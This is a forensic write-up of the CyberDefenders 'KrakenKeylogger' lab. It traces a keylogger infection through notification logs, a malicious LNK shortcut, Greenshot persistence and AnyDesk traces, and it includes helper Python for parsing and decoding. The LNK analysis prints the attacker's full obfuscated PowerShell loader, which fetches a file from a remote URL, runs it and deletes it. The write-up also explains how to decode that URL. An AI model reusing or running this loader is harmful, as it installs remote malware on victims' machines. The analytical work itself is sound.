KrakenKeylogger Lab – CyberDefenders

Disk Analysis

Scenario

An employee at a large company was assigned a task with a two-day deadline. Realizing that he could not complete the task in that timeframe, he sought help from someone else. After one day, he received a notification from that person who informed him that he had managed to finish the assignment and sent it to the employee as a test. However, the person also sent a message to the employee stating that if he wanted the completed assignment, he would have to pay $160.

The helper’s demand for payment revealed that he was a threat actor. The company’s digital forensics team was called in to investigate and identify the attacker, determine the extent of the attack, and assess potential data breaches. The team must analyze the employee’s computer and communication logs to prevent similar attacks in the future.

Provided Files

Questions

1. What is the web messaging app the employee used to talk to the attacker?

A web messaging app installed on a host normally raises Windows notifications, so we can analyze the notification database wpndatabase.db, located in \Users\OMEN\AppData\Local\Microsoft\Windows\Notifications, using SQLite:

We find that the user was using Telegram.

2. What is the password for the protected ZIP file sent by the attacker to the employee?

Clicking on the row we found earlier, we get the complete notification that contains the password:
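As an added example for the two notification questions above (not code from the write-up or the lab), the following Python pulls toast rows out of wpndatabase.db with sqlite3 and renders the XML payload as text, which is where a message body such as the ZIP password appears. The table and column names follow public forensic documentation of the Windows Notification database (an assumption, not shown on the page), and the rows are constructed sample data rather than the OMEN user's real records.

```python
import sqlite3
import xml.etree.ElementTree as ET
from datetime import datetime, timedelta, timezone

# Subset of the wpndatabase.db schema (Notification joins NotificationHandler
# via HandlerId = RecordId). Column names follow public forensic documentation
# of the database; this is an assumption, not something shown in the write-up.
SCHEMA = """
CREATE TABLE NotificationHandler(RecordId INTEGER PRIMARY KEY, PrimaryId TEXT);
CREATE TABLE Notification(Id INTEGER PRIMARY KEY, HandlerId INTEGER, Type TEXT,
                          Payload BLOB, ArrivalTime INTEGER);
"""

def filetime_to_iso(ft: int) -> str:
    """ArrivalTime is a Windows FILETIME: 100-ns ticks since 1601-01-01 UTC."""
    epoch = datetime(1601, 1, 1, tzinfo=timezone.utc)
    return (epoch + timedelta(microseconds=ft // 10)).isoformat()

def toast_text(payload: bytes) -> str:
    """Join every <text> element of a toast XML payload into one line."""
    root = ET.fromstring(payload)
    return ' | '.join((t.text or '').strip() for t in root.iter('text'))

def list_toasts(conn: sqlite3.Connection) -> list:
    """Return (id, app, arrival time, text) for each toast, oldest first."""
    rows = conn.execute("""
        SELECT n.Id, h.PrimaryId, n.ArrivalTime, n.Payload
        FROM Notification AS n
        JOIN NotificationHandler AS h ON n.HandlerId = h.RecordId
        WHERE n.Type = 'toast'
        ORDER BY n.ArrivalTime""").fetchall()
    return [(i, app, filetime_to_iso(ts), toast_text(p)) for i, app, ts, p in rows]

def build_sample_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the real database on the image."""
    conn = sqlite3.connect(':memory:')
    conn.executescript(SCHEMA)
    conn.execute("INSERT INTO NotificationHandler VALUES (7, 'Telegram.Desktop.SAMPLE')")
    toast = (b'<toast><visual><binding template="ToastGeneric">'
             b'<text>Helper</text>'
             b'<text>archive password: SAMPLE-PASSWORD</text>'
             b'</binding></visual></toast>')
    conn.execute("INSERT INTO Notification VALUES (1, 7, 'toast', ?, ?)",
                 (toast, 133000000000000000))
    return conn

if __name__ == '__main__':
    for row in list_toasts(build_sample_db()):
        print(*row, sep='  ')
```

On a real case, replace build_sample_db() with sqlite3.connect() on a copy of the wpndatabase.db taken from the image.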

3. What domain did the attacker use to download the second stage of the malware?

Analyzing the LNK file using LECmd.exe:

 .\LECmd.exe -f "C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk"

We get the following result:

LECmd version 1.5.1.0

Author: Eric Zimmerman ([email protected])
https://github.com/EricZimmerman/LECmd

Command line: -f C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk

Warning: Administrator privileges not found!


Processing C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk

Source file: C:\Users\user\Desktop\Cyber Defenders\KrakenKeylogger\Users\OMEN\Downloads\our project templet test\templet.lnk
  Source created:  2025-08-19 18:29:35
  Source modified: 2023-05-11 02:46:14
  Source accessed: 2025-08-19 18:37:03

--- Header ---
  Target created:  null
  Target modified: null
  Target accessed: null

  File size (bytes): 0
  Flags: HasTargetIdList, HasRelativePath, HasArguments, HasIconLocation, IsUnicode, HasExpIcon
  File attributes: 0
  Icon index: 67
  Show window: SwShowminnoactive (Display the window as minimized without activating it.)

Relative Path: ..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Arguments: -ExecutionPolicy UnRestricted $ProgressPreference = 0;
function nvRClWiAJT($OnUPXhNfGyEh){$OnUPXhNfGyEh[$OnUPXhNfGyEh.Length..0] -join('')};
function sDjLksFILdkrdR($OnUPXhNfGyEh){
$vecsWHuXBHu = nvRClWiAJT $OnUPXhNfGyEh;
for($TJuYrHOorcZu = 0;$TJuYrHOorcZu -lt $vecsWHuXBHu.Length;$TJuYrHOorcZu += 2){
try{$zRavFAQNJqOVxb += nvRClWiAJT $vecsWHuXBHu.Substring($TJuYrHOorcZu,2)}
catch{$zRavFAQNJqOVxb += $vecsWHuXBHu.Substring($TJuYrHOorcZu,1)}};$zRavFAQNJqOVxb};
$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';
$cDkdhkGBtl = $env:APPDATA + '\' + ($NpzibtULgyi -split '/')[-1];
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;
$wbpiCTsGYi = wget $NpzibtULgyi -UseBasicParsing;
[IO.File]::WriteAllText($cDkdhkGBtl, $wbpiCTsGYi);
& $cDkdhkGBtl;
sleep 3;
rm $cDkdhkGBtl;
Icon Location: C:\Windows\System32\imageres.dll

--- Target ID information (Format: Type ==> Value) ---

  Absolute path: This PC\C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

  -Root folder: GUID ==> This PC

  -Drive letter ==> C:

  -Directory ==> Windows
    Short name: Windows
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: Windows
    Created:
    Last access:

  -Directory ==> System32
    Short name: System32
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: System32
    Created:
    Last access:

  -Directory ==> WindowsPowerShell
    Short name: WindowsPowerShell
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: WindowsPowerShell
    Created:
    Last access:

  -Directory ==> v1.0
    Short name: v1.0
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: v1.0
    Created:
    Last access:

  -File ==> powershell.exe
    Short name: powershell.exe
    Modified:
    Extension block count: 1

    --------- Block 0 (Beef0004) ---------
    Long name: powershell.exe
    Created:
    Last access:

--- End Target ID information ---

--- Extra blocks information ---

>> Icon environment data block
   Icon path: %SystemRoot%\System32\imageres.dll

>> Special folder data block
   Special Folder ID: 37

>> Known folder data block
   Known folder GUID: 1ac14e77-02e7-4e5d-b744-2eb1ae5198b7 ==> System

>> Property store data block (Format: GUID\ID Description ==> Value)
   46588ae2-4cbc-4338-bbfc-139326986dce\4      SID                                 ==> S-1-5-21-66729632-1778321671-188542082-1001

We find the domain here; however, it is obfuscated and needs to be decoded:

$NpzibtULgyi = sDjLksFILdkrdR 'aht1.sen/hi/coucys.erstmaofershma//s:tpht';

To decode it, we reverse the obfuscated string and then swap the two characters in each 2-character chunk, which is exactly what the nvRClWiAJT and sDjLksFILdkrdR functions in the LNK arguments do at runtime.
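As an added example (not code from the write-up or the lab), this Python reimplements the two PowerShell helpers from the LNK so the string can be decoded offline, and also pulls out the host and the filename the loader would have written under %APPDATA%. The obfuscated string is the one copied from the LNK arguments above; the function names are my own.

```python
from urllib.parse import urlparse

# Obfuscated string copied verbatim from the LNK arguments shown above.
OBFUSCATED = 'aht1.sen/hi/coucys.erstmaofershma//s:tpht'

def reverse_string(s: str) -> str:
    """Equivalent of nvRClWiAJT: $s[$s.Length..0] -join ''."""
    return s[::-1]

def deobfuscate(s: str) -> str:
    """Equivalent of sDjLksFILdkrdR: reverse the whole string, then walk it in
    2-character chunks and reverse each chunk. The try/catch in the original
    only exists to keep a trailing single character when the length is odd."""
    rev = reverse_string(s)
    chunks = [rev[i:i + 2] for i in range(0, len(rev), 2)]
    return ''.join(reverse_string(chunk) for chunk in chunks)

def obfuscate(url: str) -> str:
    """Inverse transform (swap pairs, then reverse), used to confirm the decoder
    is exact; handy when checking other samples of the same loader."""
    chunks = [url[i:i + 2] for i in range(0, len(url), 2)]
    return reverse_string(''.join(reverse_string(c) for c in chunks))

def second_stage_host(obfuscated: str) -> str:
    """The domain the second stage is fetched from (the answer to this question)."""
    return urlparse(deobfuscate(obfuscated)).hostname or ''

def dropped_filename(obfuscated: str) -> str:
    """The LNK saves the download as $env:APPDATA\\<last URL path segment>."""
    return deobfuscate(obfuscated).rsplit('/', 1)[-1]

if __name__ == '__main__':
    url = deobfuscate(OBFUSCATED)
    assert obfuscate(url) == OBFUSCATED  # round-trip sanity check
    print(url)
    print('host:', second_stage_host(OBFUSCATED))
    print('dropped file:', dropped_filename(OBFUSCATED))
```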

4. What is the name of the command that the attacker injected using one of the installed LOLAPPS on the machine to achieve persistence?

The question is asking about LOLAPPS. Searching Google for LOLAPPS, we find the following list:

We need to know which app was installed on the host. Looking at AppData\Roaming, we find Greenshot:

Opening the folder, we find a .ini file:

Inside the file, we find the command:

jlhgfjhdflghjhuhuh

5. What is the complete path of the malicious file that the attacker used to achieve persistence?

We can find the complete path in the same .ini file:

6. What is the name of the application the attacker utilized for data exfiltration?

In the Videos folder, we find AnyDesk installed:

7. What is the IP address of the attacker?

Since the attacker used AnyDesk, we can analyze its ad.trace log file:

Inside ad.trace, we find the IP: